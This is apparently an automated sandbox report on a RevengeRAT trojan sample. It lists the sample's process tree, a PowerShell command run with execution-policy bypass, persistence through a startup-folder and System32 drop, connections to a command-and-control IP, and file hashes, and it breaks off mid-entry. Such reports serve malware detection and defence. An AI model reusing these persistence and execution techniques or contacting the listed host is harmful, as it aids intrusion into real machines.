SHA512 19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

Analysis: behavioral13

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

144s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSO.exe C:\Windows\system32\MSSCS.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\MSSCS.exe N/A

Uses the VBS compiler for execution

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
File opened for modification C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A
File created C:\Windows\system32\MSSCS.exe C:\Windows\system32\MSSCS.exe N/A
File created C:\Windows\system32\MSSCS.exe C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\MSSCS.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3408 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 3408 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe C:\Windows\system32\MSSCS.exe
PID 4212 wrote to memory of 2940 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4212 wrote to memory of 2940 N/A C:\Windows\system32\MSSCS.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4212 wrote to memory of 4520 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 4520 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4520 wrote to memory of 4288 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4520 wrote to memory of 4288 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 1696 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 1696 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1696 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1696 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 2944 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 2944 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2944 wrote to memory of 4400 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2944 wrote to memory of 4400 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 2208 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 2208 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2208 wrote to memory of 4344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2208 wrote to memory of 4344 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 1952 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 1952 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1952 wrote to memory of 1632 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1952 wrote to memory of 1632 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 3576 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 3576 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3576 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3576 wrote to memory of 2436 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 3796 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 3796 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3796 wrote to memory of 1448 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3796 wrote to memory of 1448 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 3504 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 3504 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3504 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3504 wrote to memory of 2380 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4212 wrote to memory of 4468 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4212 wrote to memory of 4468 N/A C:\Windows\system32\MSSCS.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4468 wrote to memory of 4028 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4468 wrote to memory of 4028 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

Processes

C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe

"C:\Users\Admin\AppData\Local\Temp\905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550.exe"

C:\Windows\system32\MSSCS.exe

"C:\Windows\system32\MSSCS.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -Command [System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Isto abriu lol','Rekt!',0,64)

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\4evrteeg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBFE0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc732A545F924041B38D38D7A828C9D8C.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1yfaxbn6.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE4E7C281185448C8A43147CFBB28F3A5.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\axigtgvo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC167.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9089C0FBDB5A48B0B2E9E33C5C1EAE99.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\liy_xgy4.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEDF6394837BA4324A37AD2AAE76AEDC1.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rju4dzrb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC251.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc67486D9BF9294623B4AD83C36D1E1D.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\a1wc_wbq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2BE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD329D59D2F6D42AFAD8535CFB2EC5ACD.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\xu5pvkll.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC32C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc565B70BBEBD84010845AE8A2151BC092.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cenbx5ag.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC38A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc559B5FCBF6CC4B9999B01A341FBA5215.TMP"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qh0h2jip.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC3E7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc93BAD35C841C4E63B4E3EDF5D06D1FD7.TMP"

Network

Country Destination Domain Proto
PT 84.91.119.105:333 tcp
GB 88.221.135.33:443 www.bing.com tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp
PT 84.91.119.105:333 tcp

Files

memory/3408-0-0x00007FFEC9AA5000-0x00007FFEC9AA6000-memory.dmp

memory/3408-1-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-2-0x000000001C0F0000-0x000000001C5BE000-memory.dmp

memory/3408-3-0x000000001C5C0000-0x000000001C666000-memory.dmp

memory/3408-4-0x000000001C740000-0x000000001C7A2000-memory.dmp

memory/3408-5-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-6-0x000000001CFC0000-0x000000001D05C000-memory.dmp

memory/3408-7-0x00007FFEC9AA5000-0x00007FFEC9AA6000-memory.dmp

memory/3408-8-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-9-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

C:\Windows\System32\MSSCS.exe

MD5 6fe3fb85216045fdf8186429c27458a7
SHA1 ef2c68d0b3edf3def5d90f1525fe87c2142e5710
SHA256 905d572f23883f5f161f920e53473989cf7dffc16643aa759f77842e54add550
SHA512 d2180f2d7ca35362a2dc322801fb0eee22820f2ac317c0be4c788c31d3939d30c9b356bf8daf0746545fb66092471f46f5d47c40403ed68b09415fcca90a125c

memory/4212-18-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/4212-20-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/3408-22-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/4212-21-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/4212-23-0x00007FFEC97F0000-0x00007FFECA191000-memory.dmp

memory/2940-37-0x0000018D74450000-0x0000018D74472000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmlidntb.qq4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\4evrteeg.cmdline

MD5 178590190de696ef08e2d14cb2c2eb91
SHA1 dd0fa8ddb746a92969d5f4b136b15153f33f92c0
SHA256 e402c58e44c9aa4ab12603c2039fb53944f77044c2a5bcf5196e7b579cee2aec
SHA512 bc7eeb662778f2c84b5ad125c222c85839d0f6f49e52468654a1380f7f4fbc1980dd6527648a54aad4ffbd1ef9b370d6239d0a88e0cf28a2fa6c6f4f59bbc5db

C:\Users\Admin\AppData\Local\Temp\4evrteeg.0.vb

MD5 076803692ac8c38d8ee02672a9d49778
SHA1 45d2287f33f3358661c3d6a884d2a526fc6a0a46
SHA256 5b3ab23bcadaeb54a41bdb1636bcaf7772af028d375f42baeb967de6579ef2a3
SHA512 cc9126384a287ccb99d10d5c2d3034cdbc8a45e94f1cec48dd95f2aa08ebbe3053ffd6d6effa31f2d84164edbb6136398cd02c08b05f027a6a777dffd1daea5d

C:\Users\Admin\AppData\Local\Temp\vbc732A545F924041B38D38D7A828C9D8C.TMP

MD5 dac60af34e6b37e2ce48ac2551aee4e7
SHA1 968c21d77c1f80b3e962d928c35893dbc8f12c09
SHA256 2edc4ef99552bd0fbc52d0792de6aaa85527621f5c56d0340d9a2963cbc9eed6
SHA512 1f1badd87be7c366221eaa184ae9b9ae0593a793f37e3c1ce2d4669c83f06de470053550890ad6781b323b201a8b9d45a5e2df5b88e01c460df45278e1228084

C:\Users\Admin\AppData\Local\Temp\RESBFE0.tmp

MD5 01a1757c3f09178ea151597395d2515d
SHA1 eebe5311e19045252d1c59a94fbe0d337d762e3a
SHA256 9dbae67ff74a4fac8aa55c152b0a85fefb36f07b37e3c5c350478eedcece867e
SHA512 d03ca6f31f9adcc7cc5cc12530a8627c3e998f8023f93b55e83725f903b0c3a373c599655da2ce79854998a33977cc0e1d04829a0cd0053c93f8df7eda33d525

C:\Users\Admin\AppData\Local\Temp\1yfaxbn6.cmdline

MD5 5d5003c90ff46620a67823a0c079a0fe
SHA1 df74b88c1224ae8bb9ff77a34e990bd0a80404b0
SHA256 059c5765bda1a233f792918bdb5ed7f188c2a316bc50563d06621e1d2cdd9a64
SHA512 e6088d2b7b1055ce77f177be2def6d91e35c165901cd221cbafce72ba76540f19a891d050614318b2ced18777d5a3629872315410994153d5dc76fffd0153b6b

C:\Users\Admin\AppData\Local\Temp\1yfaxbn6.0.vb

MD5 88cc385da858aaa7057b54eaeb0df718
SHA1 b108224d4686b5ca3faaeb1c728dfba8740a6eca
SHA256 08a30db98d970e3b6819d5ecff6eab2211ce93f4cd000c09db96ffb294d05020
SHA512 4787835240c3e2364172ac2e7649ec8fecb907c7006c38734e59aa65509f360b4596d5db8de20e0c7388a022e1c2f4f9ba75acabba798bea1d40f688539b7df7

C:\Users\Admin\AppData\Local\Temp\vbcE4E7C281185448C8A43147CFBB28F3A5.TMP

MD5 3906bddee0286f09007add3cffcaa5d5
SHA1 0e7ec4da19db060ab3c90b19070d39699561aae2
SHA256 0deb26dcfb2f74e666344c39bd16544fcaae1a950be704b1fd4e146e77b12c00
SHA512 0a73de0e70211323d9a8469ec60042a6892426e30ad798a39864ba123c1905d6e22cb8458a446e2f45ec19cf0233fa18d90e5f87ec987b657a35e35a49fea3b0

C:\Users\Admin\AppData\Local\Temp\RESC0BB.tmp

MD5 bdb44d2ed3a921221457fc3fa8386f94
SHA1 8196388e2dee5676dd1541bd81fca6a4cbd60eaa
SHA256 8b0f06228f7d15dfb461cf05ad9852712add49823ea4bc0f5075d9fbc040e618
SHA512 19af0af03d204d22221216ffc67dc424d1298f310da98e02d4d65a38405cf88f9735d2769d930da0c0b92e41996e159a0ed459bf630f25faf851468c9fcd486e

C:\Users\Admin\AppData\Local\Temp\axigtgvo.cmdline

MD5 d04581fbb8370acd3a3b7fe191143755
SHA1 c7eeeb0189fe99ea0ea6c5cb7a1b7b1a4799af6f
SHA256 fddd6c3571aea652a1711dd2b4e058f3ed11e035f64d241c980aa2ad854e58a6
SHA512 34d3550acf6a8343165ac2c0fa1584a4c9e6e2d557aa1b977826db81d3596c847e6d85e78d55ee3a6ead4aa798092c4c3d8b1b4dcf55a253207d6125361f14c4

C:\Users\Admin\AppData\Local\Temp\axigtgvo.0.vb

MD5 ac972015bef75b540eb33503d6e28cc2
SHA1 5c1d09fcf4c719711532dcfd0544dfc6f2b90260
SHA256 fa445cc76cde3461a5f1f1281fefcb0c7db69b2685f8a67a06a0f33a067e74e7
SHA512 36b2e1f7b7a6f2c60788f88d95bfdc53b7d261c203eb637a36fbd07d81bc46edc87e528f1987df73963cb75ca2f19c3a4b3df9ade52d5768ecec23753099cc83

C:\Users\Admin\AppData\Local\Temp\RESC167.tmp

MD5 08466d64ad0e59af8b96a7fa57b5105c
SHA1 7269e8d4d50840fd370621c5738479bcaff65a90
SHA256 0f86bdaf64028bbd7794404245db5bcf18ad9f343a652202e70ed14ff6608c2c
SHA512 727ce06d2394ddf3f4411f1ee2f929b9c3423115e85cca2c10e451edf76d8374f8016ba383f3b3f13e4184dd91f7f63ca8434149615377903b563496e0c0e81d

C:\Users\Admin\AppData\Local\Temp\liy_xgy4.cmdline

MD5 9ac443749eb7b5be4c18391a35d6a5c9
SHA1 385164dcf8bdea1266e470c4afd4cca6faf9f732
SHA256 832d1ae363f2fd38a429bbea7f3e5ba4d51c8809d634b01f77e1399b5c27c767
SHA512 6c5b80a38ea767357cec1989b6f94436ea85547b0c9135cfe04ca019d476203207d615e2d1d5918bf4f9ab267c1fcb1135e166604fda931aae6c74ba19ea7405

C:\Users\Admin\AppData\Local\Temp\liy_xgy4.0.vb

MD5 2b3aac520562a93ebef6a5905d4765c9
SHA1 10ab45c5d73934b16fac5e30bf22f17d3e0810c8
SHA256 b9f0edf067faaaa7da2d47e3d22b957cd302eb25e01e08ea79c664868f328f89
SHA512 9514934ed12d93ea3ad4e6873cf294bafa114bc7a784a93b14dd2410d07fae3a2c00308035a5c129c57e283de8b94ed36fd9f9de35b08eb79a82a0c732e50446

C:\Users\Admin\AppData\Local\Temp\vbcEDF6394837BA4324A37AD2AAE76AEDC1.TMP

MD5 85c61c03055878407f9433e0cc278eb7
SHA1 15a60f1519aefb81cb63c5993400dd7d31b1202f
SHA256 f0c9936a6fa84969548f9ffb4185b7380ceef7e8b17a3e7520e4acd1e369234b
SHA512 7099b06ac453208b8d7692882a76baceec3749d5e19abc1287783691a10c739210f6bdc3ee60592de8402ca0b9a864eb6613f77914b76aec1fc35157d0741756

C:\Users\Admin\AppData\Local\Temp\RESC1E4.tmp

MD5 15d4533ec04e030b5f84611da2f54a5c
SHA1 4269cae17956c94717af6cd900a73ef13439c780
SHA256 e8ca2fd51c0767ae8f007cde49ad6308765634c56dfec97d493b95ee09e7b016
SHA512 56d31a0e149141db3d325c658917afc692608b7956a0adafa2b0830033ee00d4c12efa449745cac0627b13122fdbaa6e5cc27efa3b35b6fb61b21196b713ceb5

C:\Users\Admin\AppData\Local\Temp\rju4dzrb.cmdline

MD5 d9bc14af5b5228b5f8828ab36446ff77
SHA1 f03d0b6637f66c161383f0e13ed5176a916a22ba
SHA256 93d28aa0db80fd457f1db22f15c499af4608754a2dbbb87bc8a93c034b4bb05b
SHA512 1e84656bdcf708adb3894af0c0443f70a406acbe29634898ec69c3b9b7dc39c59bf80c1b8a384c1fd1828a262febcde8b6e2ba62709f86c9662859ec6b06f0c9

C:\Users\Admin\AppData\Local\Temp\rju4dzrb.0.vb

MD5 325f27ef75bebe8b3f80680add1943d3
SHA1 1c48e211258f8887946afb063e9315b7609b4ee3
SHA256 034c75813491d628a1a740b45888fc0c301b915456aaa7ba6433b4f1368cda35
SHA512 e2165b425558872897990953c26e48776f45751a53da035f1ad86ac062ec23a2923b984d84f992de5c0170f6e192feb155ffff25f51bc76ab273b996daacb804

C:\Users\Admin\AppData\Local\Temp\RESC251.tmp

MD5 7d9a89c0be91fd9ea535182ba06bdcbf
SHA1 846b8a54b26064bedc2c673d98a8dd92bc1fb437
SHA256 2e976e7721f53568c89b0cbfa49b147d750a918d34f0d300b85adfa3045253f3
SHA512 ca6e9ce9612fa96669652b4fcb9c06cabc9c3b523be645f145f9b530d9017e9b9ec0e1dfe7be8e85569da8691ed7b6e8211e6fb21d98929e0c85555bdf194f91

C:\Users\Admin\AppData\Local\Temp\a1wc_wbq.cmdline

MD5 f61283eb4317449dc9357cd06058186b
SHA1 2290f6253815ff227d1419694d93ab7f197c4ef6
SHA256 f198b99c8300c1dc3ff7c08c451499c8efb0410a074134eec6a3a31ed93d5b1f
SHA512 8638624e53de4bef54a350dfa8381e29c3f7b4b596946817e91c53373ab20a966456aa98bd7dfd1367201420869061e5b85b5a7194a0c830127120d94b85b881

C:\Users\Admin\AppData\Local\Temp\a1wc_wbq.0.vb

MD5 539683c4ca4ee4dc46b412c5651f20f5
SHA1 564f25837ce382f1534b088cf2ca1b8c4b078aed
SHA256 ec2210924d5c1af6377ef4bdf76d6ca773aaa1ae0438b0850f44d8c4e16ef92e
SHA512 df7c1a55e53f9b9bf23d27762d2d1163c78808e9b4d95e98c84c55ca4ecb7009ed58574ae6ddede31459f300483a1dc42987295a04f6c8702f297d3f1942f4ac

C:\Users\Admin\AppData\Local\Temp\vbcD329D59D2F6D42AFAD8535CFB2EC5ACD.TMP

MD5 8135713eeb0cf1521c80ad8f3e7aad22
SHA1 1628969dc6256816b2ab9b1c0163fcff0971c154
SHA256 e14dd88df69dc98be5bedcbc8c43d1e7260b4492899fec24d964000a3b096c7a
SHA512 a0b7210095767b437a668a6b0bcedf42268e80b9184b9910ed67d665fba9f714d06c06bff7b3da63846791d606807d13311946505776a1b891b39058cfb41bd4

C:\Users\Admin\AppData\Local\Temp\RESC2BE.tmp

MD5 03078f9ae7273690ac46e24f88a8b7f1
SHA1 0c8f0d275e62a9eacae5ba7309cd771ffdc00126
SHA256 196875acc3af69d520ed1c65c289536ab77962cebd4068191b9080375390c72e
SHA512 b8ca8144637b565ada64a56433803f054a30682076f2cd756703800c13fcfbe4a5797f8eb848f3986e5464dcee628d6b3c30ab6e448ab92d1b10a8e79071bac7

C:\Users\Admin\AppData\Local\Temp\xu5pvkll.cmdline

MD5 7282e010f83ff48a31bfab8e0f8c5ffb
SHA1 7e980279b38687d96f142d3e0117baeb3019eb3a
SHA256 80ccfd5ba4d1043425565f501cd7b5fab0f327c2ab31d826e7c65ab890da0e0a
SHA512 4dd6cf0e856166021db7a7fb91e8f1082c04ff1bf2b0a805b72c693b7464c82fbd5ed0087175787fc22ac558e57b1ac75fabe22d2909ddca50c88bbad1a990c7

C:\Users\Admin\AppData\Local\Temp\xu5pvkll.0.vb

MD5 5ce3977a153152978fa71f8aa96909e9
SHA1 52af143c553c92afc257f0e0d556908eaa8919cb
SHA256 e07a7bd0c2901d3a349ab55e936b34de2d0abb5f2dc555cc128773b8045d3eed
SHA512 eaee02ceade0211be70a4710b28fdf043d5c540928e2095ead924a44c2edfca8fc6499395d1b7f5deee96394fb5309362fb87e45ee195094ec39d5fa11909d77

C:\Users\Admin\AppData\Local\Temp\RESC32C.tmp

MD5 38ff3bc6309b7a51e804a1db7fb75e2d
SHA1 987584e89c31442462c25d8cfd953f6c09725d6c
SHA256 5806fda650e773bdc9fd975bb4f6ebebb4652f966211bb16510f1b25899e2532
SHA512 ec6c6d3afa2bc0e47b835a69bbbddd5cc738169dd0e0ecb1c1461e2c4c038a20ab0f5990f539d7250ebf0b25beeb75520017453fa017ad19a0560c40e2fac8be

C:\Users\Admin\AppData\Local\Temp\cenbx5ag.cmdline

MD5 d9f84541678ea137d2cc8b8f59364ff7
SHA1 524c8aa39a9c71ef93d8c0bebfc2da5e679dbbde
SHA256 775bc48d9f3a5b71c1595e09e43ac5f12baec62480f0af5cc7e5015bc45aa8a2
